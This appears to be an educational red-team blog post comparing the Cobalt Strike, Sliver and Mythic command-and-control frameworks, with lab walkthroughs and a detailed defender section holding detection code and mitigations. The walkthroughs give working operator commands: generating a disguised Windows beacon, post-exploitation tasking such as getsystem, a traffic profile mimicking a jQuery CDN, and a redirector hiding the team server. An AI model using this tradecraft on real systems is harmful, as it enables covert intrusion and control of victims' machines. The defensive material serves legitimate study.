Legal & ethical notice. This article is for education and authorized security testing only. Operating a Command-and-Control (C2) framework against systems you do not own or for which you lack explicit written permission is illegal in most jurisdictions. Build the lab described here on isolated, disposable infrastructure.
Introduction / Overview
A Command-and-Control (C2) framework is the operator's nervous system during a red-team engagement. After an initial foothold, the framework manages implants, routes tasking, exfiltrates data, and (ideally) blends into normal network traffic. Three frameworks dominate real-world tradecraft:
- Cobalt Strike — commercial (Fortra), the long-standing industry standard. Its Beacon implant and Malleable C2 profiles set the bar for traffic shaping.
- Sliver — open source (Bishop Fox), written in Go. Cross-platform implants, mTLS/WireGuard/HTTP(S)/DNS transports, and no per-seat licensing.
- Mythic — open source (Cody Thomas / SpecterOps), a Docker-based, plugin-driven framework where agents and C2 profiles are containers you mix and match.
This post explains the shared vocabulary — beacon, listeners, malleable profiles, redirectors, OPSEC — and shows a minimal, lab-only walkthrough for each.
How it works / Background
Every modern C2 shares the same architecture: a team server that operators connect to, one or more listeners that accept implant traffic, and implants (Beacon, Sliver session/beacon, Mythic agent) running on the target.
Key concepts:
- Beacon / implant. The code running on the victim. A beacon polls the server on an interval (asynchronous, low-and-slow) instead of holding an interactive socket. Cobalt Strike popularized the term; Sliver offers both interactive sessions and asynchronous beacons.
- Listeners. Server-side endpoints bound to a transport (HTTP, HTTPS, DNS, SMB named pipe, TCP). The implant's payload is generated to match a listener.
- Malleable profiles. Text configuration that reshapes C2 traffic — URIs, headers, User-Agent, and how tasks are encoded — so HTTP traffic mimics a legitimate service (jQuery CDN, Office365, etc.). This is Cobalt Strike's signature feature; Mythic's HTTP profile and Sliver's HTTP C2 config offer similar (if less granular) control.
- Redirectors. Front-end hosts (Apache/Nginx mod_rewrite, or a cloud CDN for domain fronting) that proxy implant traffic to the hidden team server, protecting it from discovery and takedown.
- OPSEC. Operational security: choosing sleep/jitter, avoiding noisy commands, using BOFs/execute-assembly instead of dropping binaries, and matching profiles to the target environment.
Prerequisites / Lab setup
Use an isolated VLAN or host-only network. Recommended:
- A Linux VM for team servers (Debian/Ubuntu).
- A Windows 10/11 VM as the target, with Sysmon + Windows Event Forwarding for blue-team visibility.
- Docker + docker-compose (for Mythic).
- Go 1.20+ if building Sliver from source.
Install Sliver and Mythic (both free):

```bash
# Sliver — one-line installer (server + client)
curl https://sliver.sh/install | sudo bash
systemctl status sliver

# Mythic — Docker-based
git clone https://github.com/its-a-feature/Mythic
cd Mythic
sudo make                 # builds the mythic-cli
sudo ./mythic-cli start
```

Walkthrough / PoC
Sliver: listener, implant, and a beacon
Start the Sliver server console and create an HTTPS listener:

```text
sliver
# inside the sliver console:
https --lport 443
jobs                      # confirm the listener is running
```

Generate an asynchronous beacon implant for Windows and host it:
```text
# 60s callback, 30% jitter, HTTPS transport to the redirector
generate beacon --http https://redirector.lab.local --os windows \
    --arch amd64 --seconds 60 --jitter 30 --save /tmp/update.exe
# list built implants
implants
```

After execution on the target, interact with it:
```text
beacons                   # list checked-in beacons
use <beacon-id>
execute-assembly /opt/Seatbelt.exe -group=system
getsystem
```

Mythic: a containerized agent
In Mythic, you install an agent and a C2 profile as containers, then build a payload from the web UI (https://127.0.0.1:7443):
```bash
# install the Apollo (.NET) agent and the HTTP C2 profile
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http
sudo ./mythic-cli start
```

From the UI you configure the HTTP profile's callback host and interval, then build a payload. Tasking (shell whoami, inject, execute_assembly) is queued and the agent fetches it on its next callback.
Cobalt Strike: Beacon and a malleable profile
Cobalt Strike is licensed; assume you have a legitimate copy. Start the team server, then in the GUI create an HTTPS listener and generate a Beacon. The defining feature is the Malleable C2 profile — validate it before use:
```bash
# validate and run the team server with a profile (lab only)
./c2lint jquery-c2.4.5.profile
./teamserver 10.10.10.5 SuperSecretPass jquery-c2.4.5.profile
```

A trimmed profile fragment shaping the GET request to look like a CDN fetch:
```text
http-get {
    set uri "/jquery-3.3.1.min.js";
    client {
        header "Host" "code.jquery.com";
        metadata {
            base64url;
            header "Cookie";
        }
    }
}
```

Redirector (applies to all three)
Front the team server with an Nginx redirector so the implant never touches the real server directly:
```nginx
server {
    listen 443 ssl;
    server_name redirector.lab.local;
    location / {
        proxy_pass https://10.10.10.5:443;   # hidden team server
        proxy_ssl_verify off;
        proxy_set_header Host $host;
    }
}
```

For deeper coverage of post-exploitation tradecraft, see my notes on Windows privilege escalation and in-memory .NET execution.
Mermaid diagram

The implant calls a redirector (never the team server directly); the redirector proxies to the hidden server, which matches the listener and returns malleable-shaped tasking, while operators connect to the server out of band.
Detection & Defense (Blue Team)
C2 frameworks leave detectable artifacts at every layer. Defenders should weight these as heavily as the offense.
Network detection
- JA3/JA3S and JARM fingerprinting. Default Cobalt Strike and Sliver TLS stacks have known JARM signatures. Pivot on rare JARM hashes in Zeek/Suricata logs.
- Beacon timing analysis. Regular callback intervals with jitter still cluster statistically. Tools like RITA (Real Intelligence Threat Analytics) score beaconing on connection regularity and data-size consistency.
- Default profile artifacts. Stock Malleable profiles and the infamous Cobalt Strike checksum8/4444-style stagers, plus the historical "extra null byte" Beacon staging bug, are widely signatured. Emerging Threats Suricata rules cover many defaults.
- DNS C2. Flag high query volume to a single domain, long TXT/A responses, and high-entropy subdomains.
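To make the beacon-timing bullet concrete, here is an added example (my own, not code from the post or from RITA) that scores constructed connection records on callback regularity and payload-size consistency, the two signals RITA weighs; the hosts, timestamps and byte counts are invented.

```python
# Added example (not from the post or from RITA): score each (src, dst) pair on
# callback regularity and payload-size consistency, the two beaconing signals
# the post attributes to RITA. All records below are constructed.
from collections import defaultdict
from statistics import mean, pstdev

# Constructed conn records: (epoch_seconds, src_ip, dst_host, bytes_sent).
# 10.0.0.5: 60 s sleep with jitter and a near-constant check-in size.
# 10.0.0.7: human browsing with irregular timing and sizes.
CONN_LOG = [
    (1000, "10.0.0.5", "redirector.lab.local", 412),
    (1055, "10.0.0.5", "redirector.lab.local", 410),
    (1130, "10.0.0.5", "redirector.lab.local", 412),
    (1185, "10.0.0.5", "redirector.lab.local", 411),
    (1250, "10.0.0.5", "redirector.lab.local", 412),
    (1300, "10.0.0.5", "redirector.lab.local", 410),
    (1000, "10.0.0.7", "news.example", 1500),
    (1003, "10.0.0.7", "news.example", 87000),
    (1240, "10.0.0.7", "news.example", 2300),
    (1241, "10.0.0.7", "news.example", 46000),
    (1900, "10.0.0.7", "news.example", 900),
]

def regularity(values):
    """1 minus the coefficient of variation, clamped to [0, 1]; 1.0 = constant."""
    m = mean(values)
    return 0.0 if m == 0 else max(0.0, 1.0 - pstdev(values) / m)

def score_pairs(records, min_connections=5):
    """Return {(src, dst): score}; scores near 1.0 are beacon-like."""
    by_pair = defaultdict(list)
    for ts, src, dst, size in records:
        by_pair[(src, dst)].append((ts, size))
    scores = {}
    for pair, conns in by_pair.items():
        if len(conns) < min_connections:   # too few samples to judge
            continue
        conns.sort()
        intervals = [b[0] - a[0] for a, b in zip(conns, conns[1:])]
        sizes = [size for _, size in conns]
        # Equal weight to timing regularity and size consistency.
        scores[pair] = round(0.5 * regularity(intervals) + 0.5 * regularity(sizes), 3)
    return scores

def beacon_candidates(records, threshold=0.8):
    """Pairs whose score crosses the alert threshold, for analyst review."""
    return sorted(p for p, s in score_pairs(records).items() if s >= threshold)
```

Jittered sleeps blur the interval signal but not the size signal, which is why the two are combined rather than relying on timing alone.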
Host detection
- Sysmon. Watch Event ID 1 (process create), 7 (image load), 8 (CreateRemoteThread), 10 (OpenProcess with PROCESS_VM_WRITE), 11 (file create), and 17/18 (named pipes — Cobalt Strike SMB Beacon historically used predictable pipe names like \\.\pipe\msagent_*).
- Memory scanning. YARA rules from Elastic and Florian Roth (signature-base) detect Beacon/Sliver/Mythic implants in memory. Hunt-Sleeping-Beacons and BeaconHunter catch implants by inspecting threads in unbacked memory during sleep masking (Ekko/Foliage).
- Injection telemetry. execute-assembly loads the CLR into a non-.NET process; alert on clr.dll/mscoree.dll loading into unexpected hosts (Sysmon EID 7).
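A minimal detector for the injection-telemetry bullet, written as an added example (not code from the post): it parses Sysmon Event ID 7 XML and alerts when clr.dll or mscoree.dll loads into a process outside a baseline of expected .NET hosts. The events are constructed and trimmed, and EXPECTED_CLR_HOSTS is a hypothetical per-environment allow-list.

```python
# Added example (not from the post): flag Event ID 7 ImageLoad records where a
# CLR module lands in a process outside a per-environment baseline of expected
# .NET hosts. Events are constructed; EXPECTED_CLR_HOSTS is a hypothetical list.
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
CLR_MODULES = {"clr.dll", "mscoree.dll"}          # the modules the post names
EXPECTED_CLR_HOSTS = {"powershell.exe", "devenv.exe", "msbuild.exe"}  # hypothetical baseline

def _event(image, loaded, event_id=7):
    """Build a constructed, trimmed Sysmon event (real events carry more fields)."""
    return (f'<Event xmlns="{NS[1:-1]}"><System><EventID>{event_id}</EventID></System>'
            f'<EventData><Data Name="Image">{image}</Data>'
            f'<Data Name="ImageLoaded">{loaded}</Data></EventData></Event>')

SAMPLE_EVENTS = [
    _event(r"C:\Windows\System32\notepad.exe",
           r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"),
    _event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"),
    _event(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\kernel32.dll"),
    _event(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\MSCOREE.DLL"),
    _event(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\mscoree.dll", 1),
]

def parse_event(xml_text):
    """Return (event_id, {data_name: value}) for one Sysmon event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find(f"{NS}System/{NS}EventID").text)
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{NS}Data")}
    return event_id, data

def is_suspicious_clr_load(event_id, data, expected_hosts=EXPECTED_CLR_HOSTS):
    """True for EID 7 where a CLR module loads into a host outside the baseline."""
    if event_id != 7:
        return False
    loaded = PureWindowsPath(data.get("ImageLoaded", "")).name.lower()
    host = PureWindowsPath(data.get("Image", "")).name.lower()   # case-insensitive match
    return loaded in CLR_MODULES and host not in expected_hosts

def triage(events):
    """Return [(host_image, loaded_module)] for events that warrant an alert."""
    hits = []
    for xml_text in events:
        event_id, data = parse_event(xml_text)
        if is_suspicious_clr_load(event_id, data):
            hits.append((data["Image"], data["ImageLoaded"]))
    return hits
```

Build the baseline from your own fleet's EID 7 history first; a generic allow-list either misses legitimate CLR hosts or lets a lookalike process name through.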
Map to MITRE ATT&CK: T1071 (Application Layer Protocol), T1572 (Protocol Tunneling), T1090 (Proxy / redirectors), T1573 (Encrypted Channel), T1055 (Process Injection).
Mitigations
- TLS inspection at the egress proxy plus strict allow-listing of outbound domains kills most domain-fronting and CDN-fronted C2.
- Block direct outbound from servers/workstations; force traffic through an inspecting proxy.
- Application allow-listing (WDAC/AppLocker) blocks dropped implant binaries.
- Enable AMSI and script-block logging; deploy EDR with memory scanning rather than relying on signatures alone.
Conclusion
Cobalt Strike, Sliver, and Mythic solve the same problem with different trade-offs: Cobalt Strike gives unmatched traffic-shaping via Malleable C2; Sliver gives a free, Go-native, multi-transport implant; Mythic gives a modular, container-driven platform you extend with community agents. For operators, mastering listeners, malleable profiles, and redirectors is what separates a noisy demo from a stealthy operation. For defenders, the good news is that defaults are loud — JARM/JA3 fingerprints, beacon-timing analysis, and memory scanning catch the majority of real-world deployments. Know both sides.
References
- MITRE ATT&CK — Cobalt Strike (S0154): https://attack.mitre.org/software/S0154/
- MITRE ATT&CK — Sliver (S0633): https://attack.mitre.org/software/S0633/
- Sliver Wiki (Bishop Fox): https://github.com/BishopFox/sliver/wiki
- Mythic documentation: https://docs.mythic-c2.net/
- Cobalt Strike Malleable C2 reference (Fortra): https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2_main.htm
- RITA — Active Countermeasures: https://github.com/activecm/rita
- Elastic Protections (YARA) Cobalt Strike rules: https://github.com/elastic/protections-artifacts
- HackTricks — C2 / pivoting: https://book.hacktricks.xyz/